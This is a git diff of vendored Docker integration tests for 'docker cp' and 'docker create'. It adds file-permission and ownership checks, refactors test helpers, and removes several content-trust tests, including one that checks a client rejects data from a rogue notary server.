 	dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// The symlink should not have been modified.
 	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil)
@@ -237,7 +133,7 @@ func (s *DockerSuite) TestCpToCaseA(c *check.C) {
 	srcPath := cpPath(tmpDir, "file1")
 	dstPath := containerCpPath(containerID, "/root/itWorks.txt")
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
 }
@@ -258,7 +154,7 @@ func (s *DockerSuite) TestCpToCaseB(c *check.C) {
 	srcPath := cpPath(tmpDir, "file1")
 	dstDir := containerCpPathTrailingSep(containerID, "testDir")
 
-	err := runDockerCp(c, srcPath, dstDir)
+	err := runDockerCp(c, srcPath, dstDir, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err))
@@ -284,7 +180,7 @@ func (s *DockerSuite) TestCpToCaseC(c *check.C) {
 	// Ensure the container's file starts with the original content.
 	c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil)
 
 	// Should now contain file1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
@@ -311,7 +207,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
@@ -329,7 +225,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
@@ -352,7 +248,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) {
 	srcDir := cpPath(tmpDir, "dir1")
 	dstDir := containerCpPath(containerID, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -366,7 +262,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) {
 
 	dstDir = containerCpPathTrailingSep(containerID, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -388,7 +284,7 @@ func (s *DockerSuite) TestCpToCaseF(c *check.C) {
 	srcDir := cpPath(tmpDir, "dir1")
 	dstFile := containerCpPath(containerID, "/root/file1")
 
-	err := runDockerCp(c, srcDir, dstFile)
+	err := runDockerCp(c, srcDir, dstFile, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
@@ -415,7 +311,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -433,7 +329,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -456,7 +352,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) {
 	srcDir := cpPathTrailingSep(tmpDir, "dir1") + "."
 	dstDir := containerCpPath(containerID, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -470,7 +366,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) {
 
 	dstDir = containerCpPathTrailingSep(containerID, "testDir")
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -493,7 +389,7 @@ func (s *DockerSuite) TestCpToCaseI(c *check.C) {
 	srcDir := cpPathTrailingSep(tmpDir, "dir1") + "."
 	dstFile := containerCpPath(containerID, "/root/file1")
 
-	err := runDockerCp(c, srcDir, dstFile)
+	err := runDockerCp(c, srcDir, dstFile, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
@@ -521,7 +417,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -538,7 +434,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) {
 	// Ensure that dstPath doesn't exist.
 	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
 
-	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+	c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil)
 
 	// Should now contain file1-1's contents.
 	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
@@ -562,7 +458,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) {
 	srcPath := cpPath(tmpDir, "file1")
 	dstPath := containerCpPath(containerID, "/root/shouldNotExist")
 
-	err := runDockerCp(c, srcPath, dstPath)
+	err := runDockerCp(c, srcPath, dstPath, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err))
@@ -589,7 +485,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) {
 	srcPath := cpPath(tmpDir, "file1")
 	dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist")
 
-	err := runDockerCp(c, srcPath, dstPath)
+	err := runDockerCp(c, srcPath, dstPath, nil)
 	c.Assert(err, checker.NotNil)
 
 	c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err))
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
index 45d85ba5d1..8f830dcf9d 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
@@ -6,12 +6,37 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strconv"
+	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/pkg/system"
 	"github.com/go-check/check"
 )
 
+func (s *DockerSuite) TestCpToContainerWithPermissions(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	tmpDir := getTestDir(c, "test-cp-to-host-with-permissions")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	containerName := "permtest"
+
+	_, exc := dockerCmd(c, "create", "--name", containerName, "debian:jessie", "/bin/bash", "-c", "stat -c '%u %g %a' /permdirtest /permdirtest/permtest")
+	c.Assert(exc, checker.Equals, 0)
+	defer dockerCmd(c, "rm", "-f", containerName)
+
+	srcPath := cpPath(tmpDir, "permdirtest")
+	dstPath := containerCpPath(containerName, "/")
+	c.Assert(runDockerCp(c, srcPath, dstPath, []string{"-a"}), checker.IsNil)
+
+	out, err := startContainerGetOutput(c, containerName)
+	c.Assert(err, checker.IsNil, check.Commentf("output: %v", out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "2 2 700\n65534 65534 400", check.Commentf("output: %v", out))
+}
+
 // Check ownership is root, both in non-userns and userns enabled modes
 func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) {
 	testRequires(c, DaemonIsLinux, SameHostDaemon)
@@ -27,7 +52,7 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) {
 	srcPath := cpPath(tmpDir, "file1")
 	dstPath := containerCpPath(containerID, "/tmpvol", "file1")
 
-	err := runDockerCp(c, srcPath, dstPath)
+	err := runDockerCp(c, srcPath, dstPath, nil)
 	c.Assert(err, checker.IsNil)
 
 	stat, err := system.Stat(filepath.Join(tmpVolDir, "file1"))
@@ -37,3 +62,20 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) {
 	c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID"))
 	c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID"))
 }
+
+func getRootUIDGID() (int, int, error) {
+	uidgid := strings.Split(filepath.Base(testEnv.DaemonInfo.DockerRootDir), ".")
+	if len(uidgid) == 1 {
+		//user namespace remapping is not turned on; return 0
+		return 0, 0, nil
+	}
+	uid, err := strconv.Atoi(uidgid[0])
+	if err != nil {
+		return 0, 0, err
+	}
+	gid, err := strconv.Atoi(uidgid[1])
+	if err != nil {
+		return 0, 0, err
+	}
+	return uid, gid, nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go
similarity index 76%
rename from vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go
rename to vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go
index 0501c5d735..79a016f0c6 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go
@@ -7,10 +7,11 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+	"runtime"
 	"strings"
 
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/integration/checker"
 	"github.com/go-check/check"
 )
 
@@ -26,6 +27,9 @@ type fileData struct {
 	filetype fileType
 	path     string
 	contents string
+	uid      int
+	gid      int
+	mode     int
 }
 
 func (fd fileData) creationCommand() string {
@@ -55,31 +59,33 @@ func mkFilesCommand(fds []fileData) string {
 }
 
 var defaultFileData = []fileData{
-	{ftRegular, "file1", "file1"},
-	{ftRegular, "file2", "file2"},
-	{ftRegular, "file3", "file3"},
-	{ftRegular, "file4", "file4"},
-	{ftRegular, "file5", "file5"},
-	{ftRegular, "file6", "file6"},
-	{ftRegular, "file7", "file7"},
-	{ftDir, "dir1", ""},
-	{ftRegular, "dir1/file1-1", "file1-1"},
-	{ftRegular, "dir1/file1-2", "file1-2"},
-	{ftDir, "dir2", ""},
-	{ftRegular, "dir2/file2-1", "file2-1"},
-	{ftRegular, "dir2/file2-2", "file2-2"},
-	{ftDir, "dir3", ""},
-	{ftRegular, "dir3/file3-1", "file3-1"},
-	{ftRegular, "dir3/file3-2", "file3-2"},
-	{ftDir, "dir4", ""},
-	{ftRegular, "dir4/file3-1", "file4-1"},
-	{ftRegular, "dir4/file3-2", "file4-2"},
-	{ftDir, "dir5", ""},
-	{ftSymlink, "symlinkToFile1", "file1"},
-	{ftSymlink, "symlinkToDir1", "dir1"},
-	{ftSymlink, "brokenSymlinkToFileX", "fileX"},
-	{ftSymlink, "brokenSymlinkToDirX", "dirX"},
-	{ftSymlink, "symlinkToAbsDir", "/root"},
+	{ftRegular, "file1", "file1", 0, 0, 0666},
+	{ftRegular, "file2", "file2", 0, 0, 0666},
+	{ftRegular, "file3", "file3", 0, 0, 0666},
+	{ftRegular, "file4", "file4", 0, 0, 0666},
+	{ftRegular, "file5", "file5", 0, 0, 0666},
+	{ftRegular, "file6", "file6", 0, 0, 0666},
+	{ftRegular, "file7", "file7", 0, 0, 0666},
+	{ftDir, "dir1", "", 0, 0, 0777},
+	{ftRegular, "dir1/file1-1", "file1-1", 0, 0, 0666},
+	{ftRegular, "dir1/file1-2", "file1-2", 0, 0, 0666},
+	{ftDir, "dir2", "", 0, 0, 0666},
+	{ftRegular, "dir2/file2-1", "file2-1", 0, 0, 0666},
+	{ftRegular, "dir2/file2-2", "file2-2", 0, 0, 0666},
+	{ftDir, "dir3", "", 0, 0, 0666},
+	{ftRegular, "dir3/file3-1", "file3-1", 0, 0, 0666},
+	{ftRegular, "dir3/file3-2", "file3-2", 0, 0, 0666},
+	{ftDir, "dir4", "", 0, 0, 0666},
+	{ftRegular, "dir4/file3-1", "file4-1", 0, 0, 0666},
+	{ftRegular, "dir4/file3-2", "file4-2", 0, 0, 0666},
+	{ftDir, "dir5", "", 0, 0, 0666},
+	{ftSymlink, "symlinkToFile1", "file1", 0, 0, 0666},
+	{ftSymlink, "symlinkToDir1", "dir1", 0, 0, 0666},
+	{ftSymlink, "brokenSymlinkToFileX", "fileX", 0, 0, 0666},
+	{ftSymlink, "brokenSymlinkToDirX", "dirX", 0, 0, 0666},
+	{ftSymlink, "symlinkToAbsDir", "/root", 0, 0, 0666},
+	{ftDir, "permdirtest", "", 2, 2, 0700},
+	{ftRegular, "permdirtest/permtest", "perm_test", 65534, 65534, 0400},
 }
 
 func defaultMkContentCommand() string {
@@ -91,12 +97,16 @@ func makeTestContentInDir(c *check.C, dir string) {
 		path := filepath.Join(dir, filepath.FromSlash(fd.path))
 		switch fd.filetype {
 		case ftRegular:
-			c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil)
+			c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(fd.mode)), checker.IsNil)
 		case ftDir:
-			c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil)
+			c.Assert(os.Mkdir(path, os.FileMode(fd.mode)), checker.IsNil)
 		case ftSymlink:
 			c.Assert(os.Symlink(fd.contents, path), checker.IsNil)
 		}
+
+		if fd.filetype != ftSymlink && runtime.GOOS != "windows" {
+			c.Assert(os.Chown(path, fd.uid, fd.gid), checker.IsNil)
+		}
 	}
 }
 
@@ -178,10 +188,14 @@ func containerCpPathTrailingSep(containerID string, pathElements ...string) stri
 	return fmt.Sprintf("%s/", containerCpPath(containerID, pathElements...))
 }
 
-func runDockerCp(c *check.C, src, dst string) (err error) {
-	c.Logf("running `docker cp %s %s`", src, dst)
+func runDockerCp(c *check.C, src, dst string, params []string) (err error) {
+	c.Logf("running `docker cp %s %s %s`", strings.Join(params, " "), src, dst)
+
+	args := []string{"cp"}
 
-	args := []string{"cp", src, dst}
+	args = append(args, params...)
+
+	args = append(args, src, dst)
 
 	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...))
 	if err != nil {
@@ -214,18 +228,10 @@ func getTestDir(c *check.C, label string) (tmpDir string) {
 	return
 }
 
-func isCpNotExist(err error) bool {
-	return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified")
-}
-
 func isCpDirNotExist(err error) bool {
 	return strings.Contains(err.Error(), archive.ErrDirNotExists.Error())
 }
 
-func isCpNotDir(err error) bool {
-	return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect")
-}
-
 func isCpCannotCopyDir(err error) bool {
 	return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error())
 }
@@ -234,10 +240,6 @@ func isCpCannotCopyReadOnly(err error) bool {
 	return strings.Contains(err.Error(), "marked read-only")
 }
 
-func isCannotOverwriteNonDirWithDir(err error) bool {
-	return strings.Contains(err.Error(), "cannot overwrite non-directory")
-}
-
 func fileContentEquals(c *check.C, filename, contents string) (err error) {
 	c.Logf("checking that file %q contains %q\n", filename, contents)
 
@@ -289,7 +291,7 @@ func containerStartOutputEquals(c *check.C, containerID, contents string) (err e
 }
 
 func defaultVolumes(tmpDir string) []string {
-	if SameHostDaemon.Condition() {
+	if SameHostDaemon() {
 		return []string{
 			"/vol1",
 			fmt.Sprintf("%s:/vol2", tmpDir),
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
index 515a340976..9ec400b2e1 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
@@ -8,11 +8,10 @@ import (
 	"strings"
 	"time"
 
-	"os/exec"
-
-	"io/ioutil"
-
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/fakecontext"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/go-connections/nat"
 	"github.com/go-check/check"
@@ -27,13 +26,13 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) {
 
 	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
 
-	containers := []struct {
+	var containers []struct {
 		ID      string
 		Created time.Time
 		Path    string
 		Args    []string
 		Image   string
-	}{}
+	}
 
 	err := json.Unmarshal([]byte(out), &containers)
 	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
@@ -59,7 +58,7 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) {
 // Make sure we can grow the container's rootfs at creation time.
 func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) {
 	// Windows and Devicemapper support growing the rootfs
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		testRequires(c, Devicemapper)
 	}
 	out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox")
@@ -88,11 +87,11 @@ func (s *DockerSuite) TestCreateHostConfig(c *check.C) {
 
 	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
 
-	containers := []struct {
+	var containers []struct {
 		HostConfig *struct {
 			PublishAllPorts bool
 		}
-	}{}
+	}
 
 	err := json.Unmarshal([]byte(out), &containers)
 	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
@@ -110,11 +109,11 @@ func (s *DockerSuite) TestCreateWithPortRange(c *check.C) {
 
 	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
 
-	containers := []struct {
+	var containers []struct {
 		HostConfig *struct {
 			PortBindings map[nat.Port][]nat.PortBinding
 		}
-	}{}
+	}
 	err := json.Unmarshal([]byte(out), &containers)
 	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
 	c.Assert(containers, checker.HasLen, 1)
@@ -139,11 +138,11 @@ func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) {
 
 	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
 
-	containers := []struct {
+	var containers []struct {
 		HostConfig *struct {
 			PortBindings map[nat.Port][]nat.PortBinding
 		}
-	}{}
+	}
 
 	err := json.Unmarshal([]byte(out), &containers)
 	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
@@ -196,7 +195,7 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) {
 	dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox")
 
 	actual := make(map[string]string)
-	inspectFieldAndMarshall(c, name, "Config.Labels", &actual)
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual)
 
 	if !reflect.DeepEqual(expected, actual) {
 		c.Fatalf("Expected %s got %s", expected, actual)
@@ -205,19 +204,15 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) {
 
 func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) {
 	imageName := "testcreatebuildlabel"
-	_, err := buildImage(imageName,
-		`FROM busybox
-		LABEL k1=v1 k2=v2`,
-		true)
-
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox
+		LABEL k1=v1 k2=v2`))
 
 	name := "test_create_labels_from_image"
 	expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"}
 	dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName)
 
 	actual := make(map[string]string)
-	inspectFieldAndMarshall(c, name, "Config.Labels", &actual)
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual)
 
 	if !reflect.DeepEqual(expected, actual) {
 		c.Fatalf("Expected %s got %s", expected, actual)
@@ -227,8 +222,8 @@ func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) {
 func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) {
 	image := "busybox"
 	// Busybox on Windows does not implement hostname command
-	if daemonPlatform == "windows" {
-		image = WindowsBaseImage
+	if testEnv.OSType == "windows" {
+		image = testEnv.PlatformDefaults.BaseImage
 	}
 	out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname")
 	c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out))
@@ -264,18 +259,13 @@ func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) {
 
 func (s *DockerSuite) TestCreateByImageID(c *check.C) {
 	imageName := "testcreatebyimageid"
-	imageID, err := buildImage(imageName,
-		`FROM busybox
-		MAINTAINER dockerio`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox
+		MAINTAINER dockerio`))
+	imageID := getIDByName(c, imageName)
 	truncatedImageID := stringid.TruncateID(imageID)
 
 	dockerCmd(c, "create", imageID)
 	dockerCmd(c, "create", truncatedImageID)
-	dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID))
 
 	// Ensure this fails
 	out, exit, _ := dockerCmdWithError("create", fmt.Sprintf("%s:%s", imageName, imageID))
@@ -283,11 +273,14 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) {
 		c.Fatalf("expected non-zero exit code; received %d", exit)
 	}
 
-	if expected := "Error parsing reference"; !strings.Contains(out, expected) {
+	if expected := "invalid reference format"; !strings.Contains(out, expected) {
 		c.Fatalf(`Expected %q in output; got: %s`, expected, out)
 	}
 
-	out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID))
+	if i := strings.IndexRune(imageID, ':'); i >= 0 {
+		imageID = imageID[i+1:]
+	}
+	out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", imageID))
 	if exit == 0 {
 		c.Fatalf("expected non-zero exit code; received %d", exit)
 	}
@@ -297,138 +290,6 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) {
 	}
 }
 
-func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-create")
-
-	// Try create
-	createCmd := exec.Command(dockerBinary, "create", repoName)
-	s.trustedCmd(createCmd)
-	out, _, err := runCommandWithOutput(createCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try untrusted create to ensure we pushed the tag to the registry
-	createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName)
-	s.trustedCmd(createCmd)
-	out, _, err = runCommandWithOutput(createCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out))
-
-}
-
-func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL)
-	withTagName := fmt.Sprintf("%s:latest", repoName)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", withTagName)
-	dockerCmd(c, "push", withTagName)
-	dockerCmd(c, "rmi", withTagName)
-
-	// Try trusted create on untrusted tag
-	createCmd := exec.Command(dockerBinary, "create", withTagName)
-	s.trustedCmd(createCmd)
-	out, _, err := runCommandWithOutput(createCmd)
-	c.Assert(err, check.Not(check.IsNil))
-	c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out))
-
-}
-
-func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) {
-	repoName := s.setupTrustedImage(c, "trusted-isolated-create")
-
-	// Try create
-	createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName)
-	s.trustedCmd(createCmd)
-	out, _, err := runCommandWithOutput(createCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	dockerCmd(c, "rmi", repoName)
-}
-
-func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) {
-	c.Skip("Currently changes system time, causing instability")
-	repoName := s.setupTrustedImage(c, "trusted-create-expired")
-
-	// Certificates have 10 years of expiration
-	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try create
-		createCmd := exec.Command(dockerBinary, "create", repoName)
-		s.trustedCmd(createCmd)
-		out, _, err := runCommandWithOutput(createCmd)
-		c.Assert(err, check.Not(check.IsNil))
-		c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out))
-	})
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try create
-		createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName)
-		s.trustedCmd(createCmd)
-		out, _, err := runCommandWithOutput(createCmd)
-		c.Assert(err, check.Not(check.IsNil))
-		c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out))
-
-	})
-}
-
-func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL)
-	evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir")
-	c.Assert(err, check.IsNil)
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try create
-	createCmd := exec.Command(dockerBinary, "create", repoName)
-	s.trustedCmd(createCmd)
-	out, _, err = runCommandWithOutput(createCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Kill the notary server, start a new "evil" one.
-	s.not.Close()
-	s.not, err = newTestNotary(c)
-	c.Assert(err, check.IsNil)
-
-	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
-	// tag an image and upload it to the private registry
-	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
-
-	// Push up to the new server
-	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil)
-	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
-
-	// Now, try creating with the original client from this new trust server. This should fail because the new root is invalid.
